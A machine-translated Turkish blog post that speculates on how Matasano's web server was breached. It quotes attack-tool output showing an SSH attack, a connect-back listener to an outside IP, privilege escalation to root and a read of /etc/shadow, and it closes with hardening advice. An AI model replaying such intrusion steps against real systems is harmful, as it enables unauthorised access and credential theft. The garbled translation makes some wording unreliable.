Matasano nasıl saldırıya uğradı?
Gönderiyi Tam Bilgilendirmeye kadar cevaplamak imkansızdır. Ancak, biraz bilgi verdikleri için spekülasyon yapmak her zaman ilginçtir -
# ./th3_f1n4l_s0lut10n www.matasano.com
[-] 69.61.87.163:22 numaralı telefona bağlanıyor.
[/] Kök olmayan geçerli bir kullanıcı mı arıyorsunuz?
******** R3D4CT3D h4h4h4h4 ********
th3_f1n41_s01ut10n
Matasano'nun ssh portuna bağlanan sunucusuna karşı ikili " " komutlarını çalıştırıyorlar . Bazı bilinmeyen yollarla kök olmayan bir kullanıcı bulur ve çıktının geri kalanı düzeltilir.
# ./th3_f1n4l_s0lut10n -u adam -t 3 www.matasano.com
[*] 209.112.118.10:3338 tarihinde Connectback dinleyicisi.
[!] SSH2_MSG_SERVICE_ACCEPT [OpenSSH_4.5p1, OpenSSL 0.9.8g 19 Eki 2007]
İkili, 3338 numaralı bağlantı noktasında oturum açan ve sunucularına geri bağlanan bulunan kullanıcı adı kullanılarak yeniden çalıştırılır (umarım adlarında kayıtlı değildir ...).
adam_at_www: ~ $ uname -a
Linux www 2.6.20.1-1-686 # 1 SMP Paz 4 Mar 12:44:55 UTC 2007 i686 GNU / Linux
**** h4h4h4hh4h4h4 l3tz us3 m0r3! 0D4Y! H4H4H4H4H4H4H4 ****
Bu şirketin ticaret stokunu düşündüğünüzde oldukça eski olan bu çekirdeğe karşı 0 günlük bir süreleri olduğunu ima ediyor olabilirler.
adam_at_www: ~ $ cd / tmp
*********** B0R1NG ***********
root_at_www: ~ # kedi / etc / shadow
Hata! Kullanıcı aniden kök salmış durumda. / Tmp içinde başvurdukları 0 gün olabilecek yerel bir ayrıcalık yükselme istismarına sahiptirler.
Burada en az iki istismar var - OpenSSH, sistemde geçerli bir root olmayan kullanıcı elde etmek ve bu kullanıcı olarak giriş yapmak ve ardından yerel ayrıcalık yükseltme.
OpenSSH'nin 4.5 sürümünden beri bilinen birkaç güvenlik sorunu olduğunu göz önünde bulundurarak:
Gönderen OpenSSH güvenlik sayfasında :
- 5.2 sürümünden önceki OpenSSH, CPNI-957037 "SSH'ye Karşı Düz Metin Kurtarma Saldırısı" nda açıklanan protokol zayıflığına karşı savunmasızdır. Bununla birlikte, mevcut sınırlı bilgilere dayanarak, bu tarif edilen saldırının çoğu durumda mümkün olmadığı anlaşılmaktadır. Daha fazla bilgi için lütfen cbc.adv danışma belgesine ve OpenSSH 5.2 sürüm notlarına bakın.
- OpenSSH 4.9 ve daha yenisi
~/.ssh/rc
, komutu sshd_config (5) ForceCommand yönergesi ile geçersiz kılınan oturumlar için yürütülmez . Bu, belgelenmiş ancak güvenli olmayan bir davranıştır (OpenSSH 4.9 sürüm notlarında açıklanmıştır).
- OpenSSH 4.7 ve daha yeni sürümleri, OpenSSH 4.7 sürüm notlarında açıklandığı gibi, güvenilmeyen çerez oluşturma başarısız olduğunda (örn. Kasıtlı kaynak tükenmesi nedeniyle) güvenilir X11 kimlik doğrulama çerezleri oluşturmaya geri dönmez.
Sanırım bu eski Linux çekirdeği ve eski SSH arka plan programı onlar için yapılmıştı. Ayrıca, benim görüşüme göre yapmak için oldukça emin bir şey olan Internet, kullanılabilir www sunucu üzerinde çalışıyordu. İçeri giren insanlar, onları utandırmak istiyordu.
Bu saldırılar nasıl önlenir?
Bu, proaktif yönetim tarafından önlenmiş olabilir - internete dönük hizmetlerin yamanmasını sağlamak ve insanların herhangi bir yerden bağlanmasına izin vermek yerine bağlanabilecek insan sayısını sınırlamak. Bu bölüm, güvenli sistem yönetiminin zor olduğu dersi birleştiriyor ve BT'nin işleri en azından küçük şirketlerde kolayca gerçekleşecek bir şey değil, yamalı olarak tutabilmesi için zaman ayırmak için işten özveri gerektiriyor.
Bir kemer ve parantez yaklaşımı kullanmak en iyisidir - ortak anahtar kimlik doğrulaması, ssh daemon üzerinde beyaz liste, iki faktörlü kimlik doğrulama, IP kısıtlamaları ve / veya VPN'nin arkasındaki her şeyi koymak onu kilitlemek için olası yollardır.
Sanırım yarın işte ne yapacağımı biliyorum. :)